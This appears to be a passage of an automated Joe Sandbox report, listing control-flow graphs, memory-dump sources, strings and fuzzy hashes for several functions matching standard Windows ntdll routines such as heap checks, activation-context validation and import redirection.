                                                                              Function 01532890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 207 1532890-15328b3 208 156a4bc-156a4c0 207->208 209 15328b9-15328cc 207->209 208->209 210 156a4c6-156a4ca 208->210 211 15328ce-15328d7 209->211 212 15328dd-15328df 209->212 210->209 213 156a4d0-156a4d4 210->213 211->212 214 156a57e-156a585 211->214 215 15328e1-15328e5 212->215 213->209 216 156a4da-156a4de 213->216 214->212 217 15328eb-15328fa 215->217 218 1532988-153298e 215->218 216->209 219 156a4e4-156a4eb 216->219 220 1532900-1532905 217->220 221 156a58a-156a58d 217->221 222 1532908-153290c 218->222 223 156a564-156a56c 219->223 224 156a4ed-156a4f4 219->224 220->222 221->222 222->215 225 153290e-153291b 222->225 223->209 226 156a572-156a576 223->226 227 156a4f6-156a4fe 224->227 228 156a50b 224->228 229 1532921 225->229 230 156a592-156a599 225->230 226->209 231 156a57c call 1540050 226->231 227->209 232 156a504-156a509 227->232 233 156a510-156a536 call 1540050 228->233 234 1532924-1532926 229->234 236 156a5a1-156a5c9 call 1540050 230->236 249 156a55d-156a55f 231->249 232->233 233->249 238 1532993-1532995 234->238 239 1532928-153292a 234->239 238->239 245 1532997-15329b1 call 1540050 238->245 240 1532946-1532966 call 1540050 239->240 241 153292c-153292e 239->241 256 1532969-1532974 240->256 241->240 246 1532930-1532944 call 1540050 241->246 245->256 246->240 252 1532981-1532985 249->252 256->234 258 1532976-1532979 256->258 258->236 259 153297f 258->259 259->252
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: ___swprintf_l
                                                                              • String ID:
                                                                              • API String ID: 48624451-0
                                                                              • Opcode ID: f9c957a17619cfcc0d874a3c5ef072f78882806db7c6d57fb8afdcdcbde1749f
                                                                              • Instruction ID: 5fdbe60b8d417ca86b0fccf43c60983931be86f4663a9bf4e3a2edd525087bfd
                                                                              • Opcode Fuzzy Hash: f9c957a17619cfcc0d874a3c5ef072f78882806db7c6d57fb8afdcdcbde1749f
                                                                              • Instruction Fuzzy Hash: 2A51E5B6A00616AFCB11DF9C889097EFBF8BB98240B508569F569DB641D334DE418BE0
                                                                              Function 0150A250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 260 150a250-150a26f 261 150a275-150a291 260->261 262 150a58d-150a594 260->262 263 15579e6-15579eb 261->263 264 150a297-150a2a0 261->264 262->261 265 150a59a-15579bb 262->265 264->263 266 150a2a6-150a2ac 264->266 265->261 270 15579c1-15579c6 265->270 268 150a2b2-150a2b4 266->268 269 150a6ba-150a6bc 266->269 268->263 272 150a2ba-150a2bd 268->272 271 150a6c2 269->271 269->272 273 150a473-150a479 270->273 274 150a2c3-150a2c6 271->274 272->263 272->274 275 150a2c8-150a2d1 274->275 276 150a2da-150a2dd 274->276 277 150a2d7 275->277 278 15579cb-15579d5 275->278 279 150a2e3-150a32b 276->279 280 150a6c7-150a6d0 276->280 277->276 282 15579da-15579e3 call 157f290 278->282 283 150a330-150a335 279->283 280->279 281 150a6d6-15579ff 280->281 281->282 282->263 286 150a33b-150a343 283->286 287 150a47c-150a47f 283->287 289 150a34f-150a35d 286->289 291 150a345-150a349 286->291 288 150a485-150a488 287->288 287->289 292 1557a16-1557a19 288->292 293 150a48e-150a49e 288->293 289->293 295 150a363-150a368 289->295 291->289 294 150a59f-150a5a8 291->294 296 1557a1f-1557a24 292->296 297 150a36c-150a36e 292->297 293->292 298 150a4a4-150a4ad 293->298 299 150a5c0-150a5c3 294->299 300 150a5aa-150a5ac 294->300 295->297 303 1557a2b 296->303 301 1557a26 297->301 302 150a374-150a38c call 150a6e0 297->302 298->297 305 1557a01 299->305 306 150a5c9-150a5cc 299->306 300->289 304 150a5b2-150a5bb 300->304 301->303 313 150a4b2-150a4b9 302->313 314 150a392-150a3ba 302->314 308 1557a2d-1557a2f 303->308 304->297 310 1557a0c 305->310 309 150a5d2-150a5d5 306->309 306->310 308->273 312 1557a35 308->312 309->300 310->292 315 150a3bc-150a3be 313->315 316 150a4bf-150a4c2 313->316 314->315 315->308 317 150a3c4-150a3cb 315->317 316->315 318 150a4c8-150a4d3 316->318 319 150a3d1-150a3d4 317->319 320 1557ae0 317->320 318->283 321 150a3e0-150a3ea 319->321 322 1557ae4-1557afc call 157f290 320->322 321->322 323 150a3f0-150a40c call 150a840 321->323 322->273 328 150a412-150a417 323->328 329 150a5d7-150a5e0 323->329 328->273 332 150a419-150a43d 328->332 330 150a601-150a603 329->330 331 150a5e2-150a5eb 329->331 334 150a605-150a623 call 14f4508 330->334 335 150a629-150a631 330->335 331->330 333 150a5ed-150a5f1 331->333 336 150a440-150a443 332->336 337 150a681-150a6ab RtlDebugPrintTimes 333->337 338 150a5f7-150a5fb 333->338 334->273 334->335 340 150a4d8-150a4dc 336->340 341 150a449-150a44c 336->341 337->330 354 150a6b1-150a6b5 337->354 338->330 338->337 343 150a4e2-150a4e5 340->343 344 1557a3a-1557a42 340->344 345 150a452-150a454 341->345 346 1557ad6 341->346 350 150a634-150a64a 343->350 352 150a4eb-150a4ee 343->352 344->350 351 1557a48-1557a4c 344->351 348 150a520-150a539 call 150a6e0 345->348 349 150a45a-150a461 345->349 346->320 366 150a65e-150a665 348->366 367 150a53f-150a567 348->367 355 150a467-150a46c 349->355 356 150a57b-150a582 349->356 357 150a650-150a659 350->357 358 150a4f4-150a50c 350->358 351->350 359 1557a52-1557a5b 351->359 352->341 352->358 354->330 355->273 361 150a46e 355->361 356->321 362 150a588 356->362 357->345 358->341 365 150a512-150a51b 358->365 363 1557a85-1557a87 359->363 364 1557a5d-1557a60 359->364 361->273 362->320 363->350 368 1557a8d-1557a96 363->368 369 1557a62-1557a6c 364->369 370 1557a6e-1557a71 364->370 365->345 371 150a569-150a56b 366->371 372 150a66b-150a66e 366->372 367->371 368->345 373 1557a81 369->373 374 1557a73-1557a7c 370->374 375 1557a7e 370->375 371->355 376 150a571-150a573 371->376 372->371 377 150a674-150a67c 372->377 373->363 374->368 375->373 378 150a579 376->378 379 1557a9b-1557aa4 376->379 377->336 378->356 379->378 380 1557aaa-1557ab0 379->380 380->378 381 1557ab6-1557abe 380->381 381->378 382 1557ac4-1557acf 381->382 382->381 383 1557ad1 382->383 383->378
                                                                              Strings
                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 015579D0, 015579F5
                                                                              • SsHd, xrefs: 0150A3E4
                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 015579FA
                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 015579D5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                              • API String ID: 0-929470617
                                                                              • Opcode ID: 15533bc1730ae57ae6598347f349bc98e4eb8e780dd4a6562d848b0fa7db13d2
                                                                              • Instruction ID: 8fb2456fe2be950f0f39cabb37655c096361e4c7bb224296e87b7fc31fc340bb
                                                                              • Opcode Fuzzy Hash: 15533bc1730ae57ae6598347f349bc98e4eb8e780dd4a6562d848b0fa7db13d2
                                                                              • Instruction Fuzzy Hash: 2DE1F4706043028FE726CEA8C894B6EBBE1BB88314F144A2EED65CF2D1D771E945CB51
                                                                              Function 0150D770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 384 150d770-150d7ab 385 150d7b1-150d7bb 384->385 386 150d9e7-150d9ee 384->386 388 150d7c1-150d7ca 385->388 389 1559357 385->389 386->385 387 150d9f4-155932c 386->387 387->385 395 1559332-1559337 387->395 388->389 391 150d7d0-150d7d3 388->391 392 1559361-1559370 389->392 393 150d7d9-150d7db 391->393 394 150d9da-150d9dc 391->394 398 155934b-1559354 call 157f290 392->398 393->389 396 150d7e1-150d7e4 393->396 394->396 397 150d9e2 394->397 399 150d927-150d938 call 1534c30 395->399 396->389 400 150d7ea-150d7ed 396->400 397->400 398->389 404 150d7f3-150d7f6 400->404 405 150d9f9-150da02 400->405 408 150d7fc-150d848 call 150d660 404->408 409 150da0d-150da16 404->409 405->404 407 150da08-1559346 405->407 407->398 408->399 414 150d84e-150d852 408->414 409->408 411 150da1c 409->411 411->392 414->399 415 150d858-150d85f 414->415 416 150d9d1-150d9d5 415->416 417 150d865-150d869 415->417 419 1559563-155957b call 157f290 416->419 418 150d870-150d87a 417->418 418->419 420 150d880-150d887 418->420 419->399 422 150d889-150d88d 420->422 423 150d8ed-150d90d 420->423 425 150d893-150d898 422->425 426 1559372 422->426 427 150d910-150d913 423->427 428 1559379-155937b 425->428 429 150d89e-150d8a5 425->429 426->428 430 150d915-150d918 427->430 431 150d93b-150d940 427->431 428->429 434 1559381-15593aa 428->434 435 150d8ab-150d8e3 call 1538250 429->435 436 15593ea-15593ed 429->436 437 1559559-155955e 430->437 438 150d91e-150d920 430->438 432 15594d3-15594db 431->432 433 150d946-150d949 431->433 439 150da21-150da2f 432->439 440 15594e1-15594e5 432->440 433->439 441 150d94f-150d952 433->441 434->423 442 15593b0-15593ca call 15482c0 434->442 458 150d8e5-150d8e7 435->458 444 15593f1-1559400 call 15482c0 436->444 437->399 445 150d971-150d98c call 150a6e0 438->445 446 150d922 438->446 448 150d954-150d964 439->448 450 150da35-150da3e 439->450 440->439 447 15594eb-15594f4 440->447 441->430 441->448 442->458 463 15593d0-15593e3 442->463 468 1559417 444->468 469 1559402-1559410 444->469 465 150d992-150d9ba 445->465 466 1559528-155952d 445->466 446->399 454 15594f6-15594f9 447->454 455 1559512-1559514 447->455 448->430 456 150d966-150d96f 448->456 450->438 461 1559503-1559506 454->461 462 15594fb-1559501 454->462 455->439 467 155951a-1559523 455->467 456->438 458->423 464 1559420-1559424 458->464 472 155950f 461->472 473 1559508-155950d 461->473 462->455 463->442 474 15593e5 463->474 464->423 471 155942a-1559430 464->471 475 150d9bc-150d9be 465->475 466->475 476 1559533-1559536 466->476 467->438 468->464 469->444 470 1559412 469->470 470->423 478 1559457-1559460 471->478 479 1559432-155944f 471->479 472->455 473->467 474->423 480 150d9c4-150d9cb 475->480 481 1559549-155954e 475->481 476->475 477 155953c-1559544 476->477 477->427 484 15594a7-15594a9 478->484 485 1559462-1559467 478->485 479->478 483 1559451-1559454 479->483 480->416 480->418 481->399 482 1559554 481->482 482->437 483->478 486 15594cc-15594ce 484->486 487 15594ab-15594c6 call 14f4508 484->487 485->484 488 1559469-155946d 485->488 486->399 487->399 487->486 490 1559475-15594a1 RtlDebugPrintTimes 488->490 491 155946f-1559473 488->491 490->484 494 15594a3 490->494 491->484 491->490 494->484
                                                                              APIs
                                                                              Strings
                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 01559341, 01559366
                                                                              • GsHd, xrefs: 0150D874
                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0155936B
                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01559346
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                              • API String ID: 3446177414-576511823
                                                                              • Opcode ID: cfbbc99567fba258e632fe2389a627959067763a14092ae963ab841753ca31f6
                                                                              • Instruction ID: bfd1423833e453372ad717949ebd794e3bbd9273eca15790279ed18955d7a477
                                                                              • Opcode Fuzzy Hash: cfbbc99567fba258e632fe2389a627959067763a14092ae963ab841753ca31f6
                                                                              • Instruction Fuzzy Hash: 20E18D70604342CBDB65CFD8C490B2ABBF5BF88318F084A2EE9958F291D775E944CB52
                                                                              Function 0153B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 495 153b5ec-153b5fc 496 153b600-153b602 495->496 497 153b5fe 495->497 498 153b830-153b844 call 1534b87 496->498 499 153b608-153b60d 496->499 497->496 500 153b621-153b62e 499->500 501 153b60f-153b612 499->501 504 153b631-153b63d call 153b5e6 500->504 501->498 503 153b618-153b61b 501->503 503->498 503->500 508 153b64a-153b653 504->508 509 153b63f-153b644 504->509 511 153b655-153b658 508->511 512 153b65a-153b65d 508->512 509->509 510 153b646-153b648 509->510 510->504 513 153b65f-153b662 511->513 512->513 514 153b665-153b66d 512->514 513->514 515 153b690-153b693 514->515 516 153b66f-153b672 514->516 519 153b695-153b698 515->519 520 153b6ad-153b6d4 call 1536810 515->520 517 153b674 516->517 518 153b67c-153b680 516->518 521 153b676-153b67a 517->521 522 153b682-153b684 518->522 523 153b68a-153b68d 518->523 519->520 524 153b69a-153b69e 519->524 530 153b6d7-153b6e9 call 153b5e6 520->530 521->520 522->523 526 153b686-153b688 522->526 523->515 527 153b6a0-153b6a2 524->527 528 153b6a4-153b6aa 524->528 526->521 527->520 527->528 528->520 533 153b6f3-153b704 call 153b5e6 530->533 534 153b6eb-153b6f1 530->534 540 153b791-153b794 533->540 541 153b70a-153b713 533->541 535 153b71b-153b727 534->535 538 153b797 535->538 539 153b729-153b735 535->539 542 153b79a-153b79e 538->542 543 153b737 539->543 544 153b766-153b769 539->544 540->538 546 153b715 541->546 547 153b718 541->547 548 153b7a0-153b7a2 542->548 549 153b7ad-153b7b0 542->549 550 153b739-153b73c 543->550 551 153b73e-153b741 543->551 545 153b76c-153b786 call 1536580 544->545 571 153b789-153b78c 545->571 546->547 547->535 553 153b7a7-153b7ab 548->553 554 153b7a4 548->554 557 153b7b2-153b7b5 549->557 558 153b7df-153b7ed call 157d8b0 549->558 550->544 550->551 555 153b743-153b746 551->555 556 153b757-153b762 551->556 564 153b815-153b81a 553->564 554->553 555->556 565 153b748-153b74e 555->565 556->542 561 153b764 556->561 559 153b7b7-153b7ba 557->559 560 153b80f 557->560 579 153b7f7-153b7fa 558->579 580 153b7ef-153b7f5 558->580 567 153b7ce-153b7d3 559->567 568 153b7bc-153b7c1 559->568 566 153b812 560->566 561->571 569 153b81e-153b821 564->569 570 153b81c 564->570 565->545 573 153b750 565->573 566->564 567->560 578 153b7d5 567->578 568->558 575 153b7c3-153b7c6 568->575 576 153b823-153b827 569->576 577 153b829-153b82f 569->577 570->569 571->530 573->556 574 153b752-153b755 573->574 574->545 574->556 575->566 581 153b7c8-153b7ca 575->581 576->577 578->558 582 153b7d7-153b7dd 578->582 583 153b805-153b80d 579->583 584 153b7fc-153b803 579->584 580->564 581->558 585 153b7cc 581->585 582->558 582->566 583->564 584->564 585->566
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: __aulldvrm
                                                                              • String ID: +$-$0$0
                                                                              • API String ID: 1302938615-699404926
                                                                              • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                              • Instruction ID: 05b699b5cb076ce6c445900c4e8029fe034abe329a64f97bb295f365f99cefd3
                                                                              • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                              • Instruction Fuzzy Hash: CB819270E052499EEF268E6CC8517FEBBB1FFC5320F18465AD851AF292C7349941CB51
                                                                              Function 014F9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 586 14f9126-14f91db call 1547eb0 call 1539020 call 1509950 593 14f91dd-14f91ee 586->593 594 14f91f1-14f91f8 586->594 594->593 595 14f91fa-14f9201 594->595 595->593 596 14f9203-14f921f call 150a250 595->596 596->593 599 14f9221-14f9227 596->599 600 14f922d-14f9234 599->600 601 1552518-155251d 599->601 602 14f923a 600->602 603 1552522-1552529 600->603 601->593 605 14f9241-14f929e call 1515b20 602->605 604 155252f-1552539 603->604 603->605 604->605 605->593 608 14f92a4-14f92ba call 15105a0 605->608 608->593 611 14f92c0-155256b RtlDebugPrintTimes 608->611 611->593 614 1552571-155257a 611->614 615 1552651-155265c 614->615 616 1552580-1552595 call 150dd20 614->616 618 15526a0-15526a7 615->618 619 155265e-1552669 RtlDebugPrintTimes ReleaseActCtx 615->619 621 1552597-1552598 call 1503c70 616->621 622 155259d-15525cb call 1509950 616->622 618->593 619->618 621->622 626 1552645-155264c call 1552674 622->626 627 15525cd-15525ea call 150a250 622->627 626->615 627->626 631 15525ec-15525f2 627->631 632 15525f4-15525f9 631->632 633 15525fb-1552638 call 15105a0 631->633 634 155263f 632->634 633->626 637 155263a 633->637 634->626 637->634
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$@
                                                                              • API String ID: 3446177414-1194432280
                                                                              • Opcode ID: 5c814e18ec1b6b6d83367be9696a389018fedadb42d625726bf1e3e8b2a82d39
                                                                              • Instruction ID: 31cef651dcab294f4f76408af6cce367ae088f75dffa02c2d8805af70623655a
                                                                              • Opcode Fuzzy Hash: 5c814e18ec1b6b6d83367be9696a389018fedadb42d625726bf1e3e8b2a82d39
                                                                              • Instruction Fuzzy Hash: AC810A71D0026ADBDB358B54CD44BEEB7B4BB48754F0441EBAA19BB290D7709E84CFA0
                                                                              Function 0151DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1386 151db00-151db15 1387 151db1b-151db22 1386->1387 1388 155f5f9-155f603 1386->1388 1389 151db28-151db2f 1387->1389 1390 155f608-155f619 RtlDebugPrintTimes 1387->1390 1388->1390 1391 151db35-151db39 1389->1391 1392 155f61e-155f628 GetPEB 1389->1392 1390->1392 1396 151db70-151db7b GetPEB 1391->1396 1397 151db3b-151db51 1391->1397 1394 155f647-155f64c call 14eb970 1392->1394 1395 155f62a-155f645 GetPEB call 14eb970 1392->1395 1407 155f651-155f683 call 14eb970 * 3 GetPEB 1394->1407 1395->1407 1402 151db81 1396->1402 1403 155f703-155f706 1396->1403 1397->1396 1400 151db53-151db6a 1397->1400 1400->1396 1406 155f69b-155f69e 1400->1406 1408 151db86-151db89 1402->1408 1403->1402 1404 155f70c-155f71a GetPEB 1403->1404 1404->1408 1409 155f6a6-155f6ae 1406->1409 1410 155f6a0 1406->1410 1432 155f685-155f68d 1407->1432 1433 155f694 1407->1433 1412 155f71f-155f72d GetPEB 1408->1412 1413 151db8f-151db95 1408->1413 1415 155f6b0-155f6b7 call 151ffa0 1409->1415 1416 155f6ba-155f6c1 1409->1416 1410->1409 1412->1413 1414 155f733-155f73a 1412->1414 1414->1413 1415->1416 1419 155f6c4-155f6d7 1416->1419 1423 155f6e6-155f6ef 1419->1423 1424 155f6d9-155f6e4 call 151bba0 1419->1424 1423->1396 1428 155f6f5-155f6fe call 151f3e0 1423->1428 1424->1419 1428->1396 1432->1433 1433->1406
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                              • API String ID: 3446177414-56086060
                                                                              • Opcode ID: cea7064d20146c456b42d76c5fc46c16111befe4a0872f4a30f5d24c73ed2bb4
                                                                              • Instruction ID: ef2c0b9f631dc8c2a91c474e47be28bc5fb85f4c85432f5b57c8b03f0c1a09fb
                                                                              • Opcode Fuzzy Hash: cea7064d20146c456b42d76c5fc46c16111befe4a0872f4a30f5d24c73ed2bb4
                                                                              • Instruction Fuzzy Hash: 00412471A00246DFE726DB68C498B6EB7F4FF40724F10456FD9028F2A1C774A884CBA1
                                                                              Function 01574755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1435 1574755-15747a0 call 1574ec6 1438 15747a2-15747a4 1435->1438 1439 15747b0-15747b6 1435->1439 1440 15747a6-15747ac 1438->1440 1441 15747ae 1438->1441 1442 15747de-15747e0 1439->1442 1440->1439 1441->1439 1443 15747e2 1442->1443 1444 15747b8-15747c5 call 15748a8 1442->1444 1445 1574840-1574842 1443->1445 1452 15747c7-15747c9 1444->1452 1453 15747cb 1444->1453 1447 15747e4-15747f1 call 15748a8 1445->1447 1448 1574844 1445->1448 1447->1448 1457 15747f3-15747fb 1447->1457 1450 1574849-1574851 1448->1450 1455 15747d0-15747d2 1452->1455 1453->1445 1456 15747cd 1453->1456 1458 15747d4-15747d6 1455->1458 1459 15747dc 1455->1459 1456->1455 1460 1574854-157485e 1457->1460 1461 15747fd-1574813 RtlDebugPrintTimes 1457->1461 1458->1459 1462 15747d8-15747da 1458->1462 1459->1442 1460->1450 1463 1574860-15748a6 GetPEB call 156ea12 1460->1463 1461->1460 1467 1574815-157481c 1461->1467 1462->1442 1463->1450 1468 157481e-1574824 1467->1468 1469 1574838-157483e 1467->1469 1468->1445 1471 1574826-157482e 1468->1471 1469->1445 1470 1574832-1574834 1469->1470 1470->1445 1473 1574836 1470->1473 1471->1471 1472 1574830 1471->1472 1472->1445 1473->1469
                                                                              APIs
                                                                              Strings
                                                                              • LdrpCheckRedirection, xrefs: 0157488F
                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01574888
                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01574899
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.2049191856.0000000001546000.00000040.00001000.00020000.00000000.sdmp, Offset: 014C0000, based on PE: true
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000014E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001540000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.0000000001582000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 0000000D.00000002.2049191856.00000000015E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_14c0000_dLrZsz.jbxd
